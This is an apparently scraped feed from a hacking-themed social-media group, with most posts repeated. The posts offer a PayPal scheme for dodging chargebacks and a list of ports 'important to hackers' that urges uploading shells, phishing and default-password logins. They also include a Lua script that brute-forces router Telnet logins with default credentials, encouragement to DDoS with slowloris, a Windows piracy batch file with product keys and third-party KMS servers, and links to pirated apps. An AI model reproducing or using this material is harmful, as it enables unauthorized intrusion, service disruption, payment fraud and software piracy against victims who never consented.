PayPal ChargeBack Ultimate Solution.👉WHAT TO DO
Create two PayPal account, always use one to transact with your clients..then store your funds in the second account.
Eg.
Buy the funds with account 1 which is your business account,then transfer it to your private / personal account immediately. Dont keep funds in your business account, always empty the account after every succesful transactions..so when a chargeback is made by these rippers, there will be no fund to be reversed
Create two PayPal account, always use one to transact with your clients..then store your funds in the second account.
Eg.
Buy the funds with account 1 which is your business account,then transfer it to your private / personal account immediately. Dont keep funds in your business account, always empty the account after every succesful transactions..so when a chargeback is made by these rippers, there will be no fund to be reversed
Special edition
Some quick ports very important to hackers
FTP - port #20
Used for upload and download of files
Imagine if you could gain access to the sites FTP
You can upload your virus or shell!
SSH - port #22 a secure shell, mostly bash which you can use to manipulate a Linux box
Telnet - An less secure port. Can be used to connect to sites and grab banners if you don't have netcat
SMTP - simple mail transmission protocol port #25
This is evidence of email service on the victim
Anyone ready for anonymous phishing?
If you do a scan with nmap and find these ports open, connect to them with the right tools and login using default accounts
You can even write a script to log in until it finds the right password for you!
~halozorayo
Some quick ports very important to hackers
FTP - port #20
Used for upload and download of files
Imagine if you could gain access to the sites FTP
You can upload your virus or shell!
SSH - port #22 a secure shell, mostly bash which you can use to manipulate a Linux box
Telnet - An less secure port. Can be used to connect to sites and grab banners if you don't have netcat
SMTP - simple mail transmission protocol port #25
This is evidence of email service on the victim
Anyone ready for anonymous phishing?
If you do a scan with nmap and find these ports open, connect to them with the right tools and login using default accounts
You can even write a script to log in until it finds the right password for you!
~halozorayo
THE MOST AWAITED AND COMPLEX QUESTION IS SOLVED
here is a christmas present for you guys
free internet but limited internet:
its just that you have to use the port which is open in your area which could be checked using incloak .com.
Examples.
DROID VPN
Hammer VPN
TROID VPN
BUT they do offer limited internet about 2.5 GB per month…
(It can be used as emergency data when your data pack has exhausted)
note-account balance must be zero
here is a christmas present for you guys
free internet but limited internet:
its just that you have to use the port which is open in your area which could be checked using incloak .com.
Examples.
DROID VPN
Hammer VPN
TROID VPN
BUT they do offer limited internet about 2.5 GB per month…
(It can be used as emergency data when your data pack has exhausted)
note-account balance must be zero
#BugBountyTip did you know that the character '_' acts like the regex character '.' in SQL queries
Yep
NASA has been hacked
Again!
We are still learning how to write hello world
I have been saying it.
No one is truly secure!
Not even NASA!
NASA has been hacked
Again!
We are still learning how to write hello world
I have been saying it.
No one is truly secure!
Not even NASA!
Challenge write code that can log into routers and give you a shell.
.
Solution: The internet or networking part of coding are called sockets
Sockets allow you to send data from one one pc to the other
In my example, lua reads the IP addresses from a file ~/home/IP.txt
Many routers come with user and pass root toor admin administrator
Here is what using Telnet (port 23) to a router and logging in looks like
.
.
Me: nc 10.0.0.1 23
.
I hope you realize which one is the IP and port
I type this in my shell
If the connection is successful I will see
.
mikrotic router services c 2003
Login:
.
So I type the user name
.
password: bigbone
.
Then I type the password
If it's wrong, I would be asked to log in again
.
Since its successful, I get a shell
.
$>
.
Waiting for my commands
So I type whoami and see root
That's it here is my code
-- are comments like //
.
Import "socket"
.
Local banner = "Router hack 2018 by H.H\nCopy my code to become a script kiddie"
file = "~/home/IP.txt"
creds = {"admin",root","administrator","toor",""}
-- Now lets read the lines in the file and login to those ips
print(banner)
for ip in io.lines(files) do
-- now we read the file let's make the sockets
sock = socket.tcp()
--now let's connect to the IP and see if we get an error meaning IP is offline
local _,err = assert(sock:connect(ip, 23))
if err then print(ip.." is offline ")
break -- if the IP is not online break the loop and move on to the next ip
end
-- if the interpreter gets here then we can start the hack
--now we connect we only need to send user and pass
for user in values(creds) do
for pass in values(creds) do
sock:send(user)
-- send username
sock:send(pass)
--now let's see if it's still asking for login, user or password
reply = sock:receive()
If string.find("ogin", reply) or sting.find("ass", reply) then break end
--if we get here it means we found the password
print(ip.." \t\t\t".."user: \t"..user.. "\tpass:\t".. pass)
break
end
end
end
.
.
If you run my code, you will get an error
It's at io.lines(files) instead of io.lines(file)
This is so that skids or people who think they are too wide to learn coding will get errors when running my code
;)
We intentionally put errors in the code so you guys who hate coding can't run it
.
That Facebook script for hacking...
Who says it doesn't work?
Because you are lazy to debug it, you think it doesn't work
The 31337 are still using it and people keep saying
" it doesn't work "
Suckers
We just want to prevent our code from being abused
;)
Happy hacking
#for_teh_lulz
~halozorayo
.
Solution: The internet or networking part of coding are called sockets
Sockets allow you to send data from one one pc to the other
In my example, lua reads the IP addresses from a file ~/home/IP.txt
Many routers come with user and pass root toor admin administrator
Here is what using Telnet (port 23) to a router and logging in looks like
.
.
Me: nc 10.0.0.1 23
.
I hope you realize which one is the IP and port
I type this in my shell
If the connection is successful I will see
.
mikrotic router services c 2003
Login:
.
So I type the user name
.
password: bigbone
.
Then I type the password
If it's wrong, I would be asked to log in again
.
Since its successful, I get a shell
.
$>
.
Waiting for my commands
So I type whoami and see root
That's it here is my code
-- are comments like //
.
Import "socket"
.
Local banner = "Router hack 2018 by H.H\nCopy my code to become a script kiddie"
file = "~/home/IP.txt"
creds = {"admin",root","administrator","toor",""}
-- Now lets read the lines in the file and login to those ips
print(banner)
for ip in io.lines(files) do
-- now we read the file let's make the sockets
sock = socket.tcp()
--now let's connect to the IP and see if we get an error meaning IP is offline
local _,err = assert(sock:connect(ip, 23))
if err then print(ip.." is offline ")
break -- if the IP is not online break the loop and move on to the next ip
end
-- if the interpreter gets here then we can start the hack
--now we connect we only need to send user and pass
for user in values(creds) do
for pass in values(creds) do
sock:send(user)
-- send username
sock:send(pass)
--now let's see if it's still asking for login, user or password
reply = sock:receive()
If string.find("ogin", reply) or sting.find("ass", reply) then break end
--if we get here it means we found the password
print(ip.." \t\t\t".."user: \t"..user.. "\tpass:\t".. pass)
break
end
end
end
.
.
If you run my code, you will get an error
It's at io.lines(files) instead of io.lines(file)
This is so that skids or people who think they are too wide to learn coding will get errors when running my code
;)
We intentionally put errors in the code so you guys who hate coding can't run it
.
That Facebook script for hacking...
Who says it doesn't work?
Because you are lazy to debug it, you think it doesn't work
The 31337 are still using it and people keep saying
" it doesn't work "
Suckers
We just want to prevent our code from being abused
;)
Happy hacking
#for_teh_lulz
~halozorayo
Use your code
.
Humans are naturally lazy
(But you guys are too lazy)
Coding is used for automation
That's why you learn loops.
Use code to print all the numbers from 1 to 100
Someone will just write print("123...
Omg!
Use
for m=1,100 do
print(m)
end
.
Whenever you are given a job to do that will take too much time, let a computer do that for you
.
Did you know if all Facebook (or any websites) users reload a webpage at the same time it will crash the server?
.
But if we keep reloading to ddos a site, it will waste our time and energy
That's why ddos scripts like slowloris and smurf were made!
They make our work easier
.
.
Computers are faster and don't get tired
Use that to your advantage
~halozorayo
.
Humans are naturally lazy
(But you guys are too lazy)
Coding is used for automation
That's why you learn loops.
Use code to print all the numbers from 1 to 100
Someone will just write print("123...
Omg!
Use
for m=1,100 do
print(m)
end
.
Whenever you are given a job to do that will take too much time, let a computer do that for you
.
Did you know if all Facebook (or any websites) users reload a webpage at the same time it will crash the server?
.
But if we keep reloading to ddos a site, it will waste our time and energy
That's why ddos scripts like slowloris and smurf were made!
They make our work easier
.
.
Computers are faster and don't get tired
Use that to your advantage
~halozorayo
What are you expecting to see in this group this 2019?
Please inbox me(@anonyguy) your suggestions below for Topics/Discussion you are Interested in and we will try our best to grant it. ☺️
#StudyTime 📚
Please inbox me(@anonyguy) your suggestions below for Topics/Discussion you are Interested in and we will try our best to grant it. ☺️
#StudyTime 📚
Are you depressed that your windows fresh install is restricted, is it pirated? or some saddy watermark stating its not activated?
No worries, i've got a quick solution.
Just hit up the notepad, paste the following, save it with ".bat" extension, and doubleclick it !
@echo off
title Windows 10 Activator &cls&echo ********************************************* &echo Copyright: Jack Reacher &echo ********************************************* &echo.&echo Supported products:&echo - Windows 10 Home &echo - Windows 10 Professional lulz Jack Reacher &echo - Windows 10 Education &echo - Windows 10 Enterprise, Enterprise LTSB &echo.&echo Microsoft Windows 10 activation...
cscript //nologo c:\windows\system32\slmgr.vbs /ipk TX9XD-98N7V-6WMQ6-BX7FG-H8Q99 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk 3KHY7-WNT83-DGQKR-F7HPR-844BM >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk PVMJN-6DFY6-9CCP6-7BKTT-D3WVR >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk MH37W-N47XK-V7XM9-C7227-GCQG9 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk NW6C2-QMPVW-D7KKK-3GKT6-VCFB2 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk NW6C2-QMPVW-D7KKK-3GKT6-VCFB2 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk 2WH4N-8QGBV-H22JP-CT43Q-MDWWJ >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk NPPR9-FWDCX-D2C8J-H872K-2YT43 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk WNMTR-4C88C-JK8YV-HQ7T2-76DF9 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk 2F77B-TNFGY-69QQF-B8YKP-D69TJ >nul
echo ******************************** &echo.&echo.&set i=1
:server
if %i%==1 set KMS_Sev=kms.digiboy.ir
if %i%==2 set KMS_Sev=kms8.MSGuides.com
if %i%==3 set KMS_Sev=kms.chinancce.com
if %i%==4 exit
cscript //nologo c:\windows\system32\slmgr.vbs /skms %KMS_Sev% >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ato | find /i "successfully" && (echo.& echo ********************************************* & echo. & choice /n /c YN /m "Do you want to restart your PC now [Y,N]?" & if errorlevel 2 exit) || (echo The connection to the server failed! Trying to connect to another one... & echo Please wait... & echo. & echo. & set /a i+=1 & goto server)
shutdown.exe /r /t 00
tHERE YOU gO !
No worries, i've got a quick solution.
Just hit up the notepad, paste the following, save it with ".bat" extension, and doubleclick it !
@echo off
title Windows 10 Activator &cls&echo ********************************************* &echo Copyright: Jack Reacher &echo ********************************************* &echo.&echo Supported products:&echo - Windows 10 Home &echo - Windows 10 Professional lulz Jack Reacher &echo - Windows 10 Education &echo - Windows 10 Enterprise, Enterprise LTSB &echo.&echo Microsoft Windows 10 activation...
cscript //nologo c:\windows\system32\slmgr.vbs /ipk TX9XD-98N7V-6WMQ6-BX7FG-H8Q99 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk 3KHY7-WNT83-DGQKR-F7HPR-844BM >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk PVMJN-6DFY6-9CCP6-7BKTT-D3WVR >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk W269N-WFGWX-YVC9B-4J6C9-T83GX >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk MH37W-N47XK-V7XM9-C7227-GCQG9 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk NW6C2-QMPVW-D7KKK-3GKT6-VCFB2 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk NW6C2-QMPVW-D7KKK-3GKT6-VCFB2 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk 2WH4N-8QGBV-H22JP-CT43Q-MDWWJ >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk NPPR9-FWDCX-D2C8J-H872K-2YT43 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk DPH2V-TTNVB-4X9Q3-TJR4H-KHJW4 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk WNMTR-4C88C-JK8YV-HQ7T2-76DF9 >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ipk 2F77B-TNFGY-69QQF-B8YKP-D69TJ >nul
echo ******************************** &echo.&echo.&set i=1
:server
if %i%==1 set KMS_Sev=kms.digiboy.ir
if %i%==2 set KMS_Sev=kms8.MSGuides.com
if %i%==3 set KMS_Sev=kms.chinancce.com
if %i%==4 exit
cscript //nologo c:\windows\system32\slmgr.vbs /skms %KMS_Sev% >nul
cscript //nologo c:\windows\system32\slmgr.vbs /ato | find /i "successfully" && (echo.& echo ********************************************* & echo. & choice /n /c YN /m "Do you want to restart your PC now [Y,N]?" & if errorlevel 2 exit) || (echo The connection to the server failed! Trying to connect to another one... & echo Please wait... & echo. & echo. & set /a i+=1 & goto server)
shutdown.exe /r /t 00
tHERE YOU gO !
Here's how to install Metasploit Framework on Android and start Hacking using Termux
https://null-byte.wonderhowto.com/forum/to-install-metasploit-framework-android-part-1-termux-0186792/
https://null-byte.wonderhowto.com/forum/to-install-metasploit-framework-android-part-1-termux-0186792/
WonderHowTo
How to: Install Metasploit Framework on Android | Part #1 - in TermuX
Hi My Fellow H4ck3Rs! In this Thread, I`m gonna show you how to install Metasploit Framework in TermuX. You can use it for Android to Android/Windows hacking. It is the best way to hack another and...
Easiest Way to get to an EE Representative without Paying to talk to them when you've no Credit. - Just Press the No. Digit that you are "Thinking of Leaving EE" - Get through to a member of the team straight away. Works Everytime xD
How to Download FL Studio Mobile for Free
https://medium.com/@annabellediama/fl-studio-mobile-v3-1-941-apk-obb-data-mod-full-paid-android-1811d5dcea56
https://medium.com/@annabellediama/fl-studio-mobile-v3-1-941-apk-obb-data-mod-full-paid-android-1811d5dcea56